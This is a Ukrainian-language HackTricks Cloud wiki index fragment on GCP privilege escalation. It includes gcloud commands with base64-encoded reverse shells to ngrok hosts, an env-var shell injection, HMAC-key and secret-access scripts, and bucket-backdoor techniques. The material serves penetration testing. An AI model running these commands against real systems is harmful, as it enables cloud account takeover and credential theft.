слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » GCP - Resourcemanager Privesc","id":"1038","title":"GCP - Resourcemanager Privesc"},"1039":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager","id":"1039","title":"resourcemanager"},"104":{"body":"Якщо всі дії (або шкідлива дія) дозволені, користувач може використовувати Github action , яка є шкідливою і скомпрометує контейнер , в якому вона виконується. caution Запуск шкідливої Github Action може бути зловжито зловмисником для: Викрадення всіх секретів , до яких має доступ Action Бічного переміщення , якщо Action виконується в інфраструктурі третьої сторони , де можна отримати доступ до токена SA, що використовується для запуску машини (можливо, через сервіс метаданих) Зловживання токеном , що використовується робочим процесом , щоб викрасти код репозиторію , в якому виконується Action, або навіть змінити його .","breadcrumbs":"Github Security » Basic Github Information » Git Action Compromise","id":"104","title":"Git Action Compromise"},"1040":{"body":"Як і в експлуатації iam.serviceAccounts.setIamPolicy, цей дозвіл дозволяє вам модифікувати ваші дозволи щодо будь-якого ресурсу на рівні організації . Отже, ви можете слідувати тому ж прикладу експлуатації.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.organizations.setIamPolicy","id":"1040","title":"resourcemanager.organizations.setIamPolicy"},"1041":{"body":"Як і в експлуатації iam.serviceAccounts.setIamPolicy, цей дозвіл дозволяє вам модифікувати ваші дозволи щодо будь-якого ресурсу на рівні папки . Отже, ви можете слідувати тому ж прикладу експлуатації.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.folders.setIamPolicy","id":"1041","title":"resourcemanager.folders.setIamPolicy"},"1042":{"body":"Як і в експлуатації iam.serviceAccounts.setIamPolicy, цей дозвіл дозволяє вам модифікувати ваші дозволи щодо будь-якого ресурсу на рівні проекту . Отже, ви можете слідувати тому ж прикладу експлуатації. tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Resourcemanager Privesc » resourcemanager.projects.setIamPolicy","id":"1042","title":"resourcemanager.projects.setIamPolicy"},"1043":{"body":"Reading time: 3 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » GCP - Run Privesc","id":"1043","title":"GCP - Run Privesc"},"1044":{"body":"Для отримання додаткової інформації про Cloud Run дивіться: GCP - Cloud Run Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » Cloud Run","id":"1044","title":"Cloud Run"},"1045":{"body":"Зловмисник з цими дозволами може створити службу запуску, що виконує довільний код (довільний контейнер Docker), прикріпити до неї обліковий запис служби та змусити код екстрагувати токен облікового запису служби з метаданих . Скрипт експлуатації для цього методу можна знайти тут , а образ Docker можна знайти тут . Зверніть увагу, що при використанні gcloud run deploy замість просто створення служби потрібен дозвіл update . Перевірте приклад тут .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.create , iam.serviceAccounts.actAs, run.routes.invoke","id":"1045","title":"run.services.create , iam.serviceAccounts.actAs, run.routes.invoke"},"1046":{"body":"Як і попередній, але для оновлення служби: bash # Launch some web server to listen in port 80 so the service works\necho \"python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1\" | base64\n# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== gcloud run deploy hacked \\\n--image=ubuntu:22.04 \\ # Make sure to use an ubuntu version that includes python3\n--command=bash \\\n--args=\"-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash\" \\\n--service-account=\"-compute@developer.gserviceaccount.com\" \\\n--region=us-central1 \\\n--allow-unauthenticated # If you don't have permissions to use \"--allow-unauthenticated\", dont use it","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.update , iam.serviceAccounts.actAs","id":"1046","title":"run.services.update , iam.serviceAccounts.actAs"},"1047":{"body":"Надайте собі попередні дозволи на cloud Run.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.services.setIamPolicy","id":"1047","title":"run.services.setIamPolicy"},"1048":{"body":"Запустіть завдання з реверс-шеллом, щоб вкрасти обліковий запис служби, вказаний у команді. Ви можете знайти експлойт тут . bash gcloud beta run jobs create jab-cloudrun-3326 \\\n--image=ubuntu:latest \\\n--command=bash \\\n--args=\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash\" \\\n--service-account=\"@$PROJECT_ID.iam.gserviceaccount.com\" \\\n--region=us-central1","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)","id":"1048","title":"run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)"},"1049":{"body":"Схоже на попереднє, можливо оновити роботу та оновити SA , команду та виконати її : bash gcloud beta run jobs update hacked \\\n--image=mubuntu:latest \\\n--command=bash \\\n--args=\"-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash\" \\\n--service-account=-compute@developer.gserviceaccount.com \\\n--region=us-central1 \\\n--execute-now","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)","id":"1049","title":"run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)"},"105":{"body":"Захист гілок призначений для не надання повного контролю над репозиторієм користувачам. Мета полягає в тому, щоб встановити кілька методів захисту перед тим, як мати можливість писати код у деякій гілці . Захисти гілок репозиторію можна знайти за адресою https://github.com///settings/branches note Неможливо встановити захист гілки на рівні організації . Тому всі вони повинні бути оголошені в кожному репозиторії. Різні захисти можуть бути застосовані до гілки (наприклад, до master): Ви можете вимагати PR перед злиттям (тому ви не можете безпосередньо зливати код у гілку). Якщо це вибрано, можуть бути застосовані різні інші захисти: Вимагати кількість схвалень . Дуже поширено вимагати, щоб 1 або 2 інші особи схвалили ваш PR, щоб одна особа не могла безпосередньо зливати код. Відхиляти схвалення, коли нові коміти додаються . Якщо ні, користувач може схвалити легітимний код, а потім користувач може додати шкідливий код і злити його. Вимагати перевірок від Власників Коду . Принаймні 1 власник коду репозиторію повинен схвалити PR (щоб \"випадкові\" користувачі не могли його схвалити) Обмежити, хто може відхиляти перевірки запитів на злиття. Ви можете вказати людей або команди, яким дозволено відхиляти перевірки запитів на злиття. Дозволити вказаним акторам обійти вимоги запиту на злиття . Ці користувачі зможуть обійти попередні обмеження. Вимагати, щоб перевірки статусу пройшли перед злиттям. Деякі перевірки повинні пройти перед тим, як зможете злити коміт (наприклад, github action, що перевіряє, чи немає явних секретів). Вимагати вирішення розмови перед злиттям . Усі коментарі до коду повинні бути вирішені перед тим, як PR може бути злитий. Вимагати підписаних комітів . Коміти повинні бути підписані. Вимагати лінійної історії. Запобігти злиттю комітів, які були надіслані до відповідних гілок. Включити адміністраторів . Якщо це не встановлено, адміністратори можуть обійти обмеження. Обмежити, хто може надсилати до відповідних гілок . Обмежити, хто може надіслати PR. note Як ви можете бачити, навіть якщо вам вдалося отримати деякі облікові дані користувача, репозиторії можуть бути захищені, що заважає вам надсилати код до master , наприклад, щоб скомпрометувати CI/CD pipeline.","breadcrumbs":"Github Security » Basic Github Information » Branch Protections","id":"105","title":"Branch Protections"},"1050":{"body":"Надайте собі попередні дозволи на Cloud Jobs.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.setIamPolicy","id":"1050","title":"run.jobs.setIamPolicy"},"1051":{"body":"Зловживайте змінними середовища виконання завдання, щоб виконати довільний код і отримати зворотне з'єднання для вивантаження вмісту контейнера (джерельний код) та доступу до SA всередині метаданих: bash gcloud beta run jobs execute job-name --region --update-env-vars=\"PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)","id":"1051","title":"run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)"},"1052":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Run Privesc » Посилання","id":"1052","title":"Посилання"},"1053":{"body":"Reading time: 2 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » GCP - Secretmanager Privesc","id":"1053","title":"GCP - Secretmanager Privesc"},"1054":{"body":"Для отримання додаткової інформації про secretmanager: GCP - Secrets Manager Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager","id":"1054","title":"secretmanager"},"1055":{"body":"Це надає вам доступ для читання секретів з менеджера секретів і, можливо, це може допомогти в ескалації привілеїв (залежно від того, яка інформація зберігається в секреті): bash # Get clear-text of version 1 of secret: \"\"\ngcloud secrets versions access 1 --secret=\"\" Оскільки це також техніка після експлуатації, її можна знайти в: GCP - Secretmanager Post Exploitation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.versions.access","id":"1055","title":"secretmanager.versions.access"},"1056":{"body":"Це надає вам доступ до читання секретів з менеджера секретів, наприклад, використовуючи: bash gcloud secrets add-iam-policy-binding \\\n--member=\"serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com\" \\\n--role=\"roles/secretmanager.secretAccessor\" tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Secretmanager Privesc » secretmanager.secrets.setIamPolicy","id":"1056","title":"secretmanager.secrets.setIamPolicy"},"1057":{"body":"Reading time: 2 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » GCP - Serviceusage Privesc","id":"1057","title":"GCP - Serviceusage Privesc"},"1058":{"body":"Наступні дозволи корисні для створення та крадіжки API ключів, зверніть увагу на це з документації: API ключ є простим зашифрованим рядком, який ідентифікує додаток без будь-якого принципала . Вони корисні для доступу до публічних даних анонімно і використовуються для асоціювання API запитів з вашим проектом для квоти та білінгу . Отже, з API ключем ви можете змусити цю компанію платити за ваше використання API, але ви не зможете підвищити привілеї. Щоб дізнатися про інші дозволи та способи генерації API ключів, перегляньте: GCP - Apikeys Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage","id":"1058","title":"serviceusage"},"1059":{"body":"Був знайдений не задокументований API, який можна використовувати для створення API ключів: bash curl -XPOST \"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.create","id":"1059","title":"serviceusage.apiKeys.create"},"106":{"body":"https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise https://docs.github.com/en/enterprise-server https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards https://docs.github.com/en/actions/security-guides/encrypted-secrets tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"Github Security » Basic Github Information » References","id":"106","title":"References"},"1060":{"body":"Було знайдено ще один не задокументований API для переліку API ключів, які вже були створені (API ключі з'являються у відповіді): bash curl \"https://apikeys.clients6.google.com/v1/projects//apiKeys?access_token=$(gcloud auth print-access-token)\"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.apiKeys.list","id":"1060","title":"serviceusage.apiKeys.list"},"1061":{"body":"З цими дозволами зловмисник може активувати та використовувати нові сервіси в проекті. Це може дозволити зловмиснику активувати такі сервіси, як admin або cloudidentity , щоб спробувати отримати доступ до інформації Workspace або інших сервісів для доступу до цікавих даних.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » serviceusage.services.enable , serviceusage.services.use","id":"1061","title":"serviceusage.services.enable , serviceusage.services.use"},"1062":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ Support HackTricks and get benefits! Do you work in a cybersecurity company ? Do you want to see your company advertised in HackTricks ? or do you want to have access the latest version of the PEASS or download HackTricks in PDF ? Check the SUBSCRIPTION PLANS ! Discover The PEASS Family , our collection of exclusive NFTs Get the official PEASS & HackTricks swag Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm . Share your hacking tricks submitting PRs to the hacktricks github repo **** .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Serviceusage Privesc » References","id":"1062","title":"References"},"1063":{"body":"Reading time: 3 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » GCP - Sourcerepos Privesc","id":"1063","title":"GCP - Sourcerepos Privesc"},"1064":{"body":"Для отримання додаткової інформації про репозиторії джерел перегляньте: GCP - Source Repositories Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Репозиторії джерел","id":"1064","title":"Репозиторії джерел"},"1065":{"body":"З цим дозволом можна завантажити репозиторій локально: bash gcloud source repos clone --project=","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.get","id":"1065","title":"source.repos.get"},"1066":{"body":"Принципал з цим дозволом зможе писати код всередині репозиторію, скопійованого за допомогою gcloud source repos clone . Але зверніть увагу, що це дозволення не може бути прикріплене до користувацьких ролей, тому його потрібно надати через попередньо визначену роль, таку як: Власник Редактор Адміністратор репозиторію джерел (roles/source.admin) Автор репозиторію джерел (roles/source.writer) Щоб написати, просто виконайте звичайний git push .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.update","id":"1066","title":"source.repos.update"},"1067":{"body":"З цим дозволом зловмисник може надати собі попередні дозволи.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.setIamPolicy","id":"1067","title":"source.repos.setIamPolicy"},"1068":{"body":"Якщо зловмисник має доступ до секретів , де зберігаються токени, він зможе їх вкрасти. Для отримання додаткової інформації про те, як отримати доступ до секрету, перевірте: GCP - Secretmanager Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Доступ до секретів","id":"1068","title":"Доступ до секретів"},"1069":{"body":"Можливо додати ssh ключі до проекту репозиторію джерел у веб-консолі. Це робить POST запит до /v1/sshKeys:add і може бути налаштовано за адресою https://source.cloud.google.com/user/ssh_keys Як тільки ваш ssh ключ налаштовано, ви можете отримати доступ до репозиторію за допомогою: bash git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/ І тоді використовуйте git команди, як зазвичай.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Додати SSH ключі","id":"1069","title":"Додати SSH ключі"},"107":{"body":"Reading time: 6 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"Gitea Security » Gitea Security","id":"107","title":"Gitea Security"},"1070":{"body":"Можливо створити ручні облікові дані для доступу до Source Repositories: Натискаючи на перше посилання, ви перейдете на https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform&state&authuser=3 Це викличе Oauth авторизаційний запит для надання доступу до Google Cloud Development . Тому вам знадобляться або облікові дані користувача , або відкрита сесія в браузері для цього. Це перенаправить вас на сторінку з bash-скриптом для виконання та налаштування git cookie в $HOME/.gitcookies Виконавши скрипт, ви зможете використовувати git clone, push... і це буде працювати.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » Ручні облікові дані","id":"1070","title":"Ручні облікові дані"},"1071":{"body":"З цим дозволом можливо вимкнути стандартний захист Source Repositories, щоб не завантажувати код, що містить приватні ключі: bash gcloud source project-configs update --disable-pushblock Ви також можете налаштувати іншу тему pub/sub або навіть повністю її вимкнути: bash gcloud source project-configs update --remove-topic=REMOVE_TOPIC\ngcloud source project-configs update --remove-topic=UPDATE_TOPIC tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Sourcerepos Privesc » source.repos.updateProjectConfig","id":"1071","title":"source.repos.updateProjectConfig"},"1072":{"body":"Reading time: 6 minutes tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCP - Storage Privesc","id":"1072","title":"GCP - Storage Privesc"},"1073":{"body":"Основна інформація: GCP - Storage Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Storage","id":"1073","title":"Storage"},"1074":{"body":"Ця дозволяє вам завантажувати файли, збережені в Cloud Storage . Це потенційно дозволить вам підвищити привілеї, оскільки в деяких випадках чутлива інформація зберігається там . Більше того, деякі сервіси GCP зберігають свою інформацію в бакетах: GCP Composer : Коли ви створюєте середовище Composer, код усіх DAG буде збережено в бакеті . Ці завдання можуть містити цікаву інформацію в своєму коді. GCR (Container Registry) : Зображення контейнерів зберігаються в бакетах , що означає, що якщо ви можете читати бакети, ви зможете завантажити зображення та шукати витоки та/або вихідний код .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.get","id":"1074","title":"storage.objects.get"},"1075":{"body":"Ви можете надати собі дозвіл на зловживання будь-яким з попередніх сценаріїв цього розділу .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.setIamPolicy","id":"1075","title":"storage.objects.setIamPolicy"},"1076":{"body":"Для прикладу, як змінити дозволи з цим дозволом, перегляньте цю сторінку: GCP - Public Buckets Privilege Escalation","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.buckets.setIamPolicy","id":"1076","title":"storage.buckets.setIamPolicy"},"1077":{"body":"Функція \"інтероперабельності\" Cloud Storage, розроблена для взаємодії між хмарами , такими як AWS S3, передбачає створення HMAC-ключів для облікових записів служб і користувачів . Зловмисник може скористатися цим, генеруючи HMAC-ключ для облікового запису служби з підвищеними привілеями , таким чином підвищуючи привілеї в Cloud Storage . Хоча HMAC-ключі, пов'язані з користувачами, можна отримати лише через веб-консоль, як доступні, так і секретні ключі залишаються постійно доступними , що дозволяє потенційно зберігати резервні копії доступу. У свою чергу, HMAC-ключі, пов'язані з обліковими записами служб, доступні через API, але їх доступні та секретні ключі не можна отримати після створення, що додає рівень складності для безперервного доступу. bash # Create key\ngsutil hmac create # You might need to execute this inside a VM instance ## If you have TROUBLES creating the HMAC key this was you can also do it contacting the API directly:\nPROJECT_ID = '$PROJECT_ID'\nTARGET_SERVICE_ACCOUNT = f\"exam-storage-sa-read-flag-3@{PROJECT_ID}.iam.gserviceaccount.com\"\nACCESS_TOKEN = \"$CLOUDSDK_AUTH_ACCESS_TOKEN\"\nimport requests\nimport json\nkey = requests.post(\nf'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys',\nparams={'access_token': ACCESS_TOKEN, 'serviceAccountEmail': TARGET_SERVICE_ACCOUNT}\n).json()\n#print(json.dumps(key, indent=4))\nprint(f'ID: {key[\"metadata\"][\"accessId\"]}')\nprint(f'Secret: {key[\"secret\"]}') # Configure gsutil to use the HMAC key\ngcloud config set pass_credentials_to_gsutil false\ngsutil config -a # Use it\ngsutil ls gs://[BUCKET_NAME] # Restore\ngcloud config set pass_credentials_to_gsutil true Ще один скрипт експлуатації для цього методу можна знайти тут .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.hmacKeys.create","id":"1077","title":"storage.hmacKeys.create"},"1078":{"body":"Щоб створити новий об'єкт у бакеті, вам потрібні storage.objects.create, а відповідно до документації , вам також потрібні storage.objects.delete, щоб модифікувати існуючий об'єкт. Дуже поширена експлуатація бакетів, в які можна записувати в хмарі, відбувається у випадку, якщо бакет зберігає файли веб-сервера , ви можете бути в змозі зберегти новий код , який буде використовуватися веб-додатком.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » storage.objects.create, storage.objects.delete = Права на запис у сховище","id":"1078","title":"storage.objects.create, storage.objects.delete = Права на запис у сховище"},"1079":{"body":"Composer - це Apache Airflow , керований у GCP. Він має кілька цікавих функцій: Він працює всередині GKE кластера , тому SA, який використовує кластер, доступний коду, що виконується всередині Composer Усі компоненти середовища композера ( код DAGs , плагіни та дані) зберігаються всередині бакета GCP. Якщо зловмисник має права на читання та запис, він може моніторити бакет і коли DAG створюється або оновлюється, подати версію з бекдором , щоб середовище композера отримало зберігання версію з бекдором. Ви можете знайти PoC цієї атаки в репозиторії: https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Composer","id":"1079","title":"Composer"},"108":{"body":"Gitea - це самостійно хостинговане, кероване спільнотою легке рішення для хостингу коду , написане на Go.","breadcrumbs":"Gitea Security » Що таке Gitea","id":"108","title":"Що таке Gitea"},"1080":{"body":"Код Cloud Functions зберігається в Storage, і коли створюється нова версія, код надсилається до бакета, а потім новий контейнер створюється з цього коду. Тому, перезаписуючи код перед створенням нової версії, можна змусити хмарну функцію виконувати довільний код . Ви можете знайти PoC цієї атаки в репозиторії: https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » Cloud Functions","id":"1080","title":"Cloud Functions"},"1081":{"body":"Версії AppEngine генерують деякі дані всередині бакета у форматі назви: staging..appspot.com. Всередині цього бакета можна знайти папку під назвою ae, яка міститиме папку для кожної версії програми AppEngine, а всередині цих папок можна знайти файл manifest.json. Цей файл містить json з усіма файлами, які повинні бути використані для створення конкретної версії. Більше того, можна знайти реальні назви файлів, URL до них всередині бакета GCP (файли всередині бакета змінили свої назви на їх sha1 хеш) та sha1 хеш кожного файлу. Зверніть увагу, що неможливо попередньо захопити цей бакет, оскільки користувачі GCP не мають права генерувати бакети, використовуючи доменне ім'я appspot.com. Однак, з правами на читання та запис у цьому бакеті, можна ескалувати привілеї до SA, прикріпленого до версії App Engine, моніторячи бакет і будь-який раз, коли вносяться зміни (нова версія), модифікувати нову версію якомога швидше. Таким чином, контейнер, який створюється з цього коду, виконає код з бекдором. Зазначену атаку можна виконати багатьма різними способами, всі вони починаються з моніторингу бакета staging..appspot.com: Завантажте повний новий код версії AppEngine до іншого доступного бакета та підготуйте manifest.json файл з новим ім'ям бакета та sha1 хешами . Тоді, коли нова версія створюється всередині бакета, вам просто потрібно модифікувати файл manifest.json і завантажити шкідливий. Завантажте модифіковану версію requirements.txt, яка використовуватиме код шкідливих залежностей і оновить файл manifest.json з новим ім'ям файлу, URL та його хешем. Завантажте модифікований файл main.py або app.yaml, який виконуватиме шкідливий код і оновіть файл manifest.json з новим ім'ям файлу, URL та його хешем. Ви можете знайти PoC цієї атаки в репозиторії: https://github.com/carlospolop/Monitor-Backdoor-AppEngine","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » App Engine","id":"1081","title":"App Engine"},"1082":{"body":"Google Container Registry зберігає зображення всередині бакетів, якщо ви можете записувати в ці бакети , ви можете бути в змозі переміститися вбік до того, де ці бакети виконуються. Бакет, що використовується GCR, матиме URL, подібний до gs://.artifacts..appspot.com (Верхні піддомени вказані тут ). tip Ця служба застаріла, тому ця атака більше не є корисною. Більше того, Artifact Registry, служба, яка замінює цю, не зберігає зображення в бакетах.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Storage Privesc » GCR","id":"1082","title":"GCR"},"1083":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:~:text=apiKeys.-,create,privileges%20than%20our%20own%20user. tip Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Підтримайте HackTricks Перевірте плани підписки ! Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live . Діліться хакерськими 